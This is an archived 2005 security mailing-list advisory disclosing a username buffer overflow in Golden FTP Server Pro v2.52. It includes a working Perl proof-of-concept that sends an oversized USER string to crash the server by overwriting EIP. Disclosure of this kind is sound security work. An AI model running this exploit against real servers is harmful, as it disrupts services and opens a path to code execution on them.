lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <80115b690504271016618d0c4d@mail.gmail.com>
Date: Wed, 27 Apr 2005 10:16:44 -0700
From: Reed Arvin <reedarvin@...il.com>
To: bugtraq@...urityfocus.com, full-disclosure@...ts.grok.org.uk,
	vuln@...unia.com, news@...uriteam.com
Subject: Buffer overflow in KMiNT21 Software Golden FTP
	Server Pro v2.52 (10.04.2005)


Summary:
Buffer overflow in KMiNT21 Software Golden FTP Server Pro v2.52 (10.04.2005)
(http://www.goldenftpserver.com/)

Details:
Passing an overly long username parameter to the FTP server causes the
EIP register to be overwritten after the USER/PASS login sequence is
completed. Once this has been done the FTP will either crash or
execute code (depending on the value of the username) when the server
statistics are viewed by an administrator.

Vulnerable Versions:
Golden FTP Server Pro v2.52 (10.04.2005)

Patches/Workarounds:
The vendor was notified of the issue. There was no response.

Exploit:
Run the following PERL script against the server. Afterward, right
click on the Golden FTP Server Pro icon in the Windows tray and click
Statistic. The process will die.

#===== Start GoldenFTPServer_Overflow.pl =====
#
# Usage: GoldenFTPServer_Overflow.pl <ip>
#        GoldenFTPServer_Overflow.pl 127.0.0.1
#
# KMiNT21 Software Golden FTP Server Pro v2.52 (10.04.2005)
#
# Download:
# http://www.goldenftpserver.com/
#
##############################################################

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
				    PeerPort => "21",
				    Proto    => "TCP"))
{
	print "Attempting to kill Golden FTP Server at $ARGV[0]:21...";

	sleep(1);

	print $socket "USER " . "A" x 332 . "BBBB\r\n";

	sleep(1);

	print $socket "PASS " . "\r\n";

	close($socket);
}
else
{
	print "Cannot connect to $ARGV[0]:21\n";
}
#===== End GoldenFTPServer_Overflow.pl =====

Discovered by Reed Arvin reedarvin[at]gmail[dot]com
(http://reedarvin.thearvins.com)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists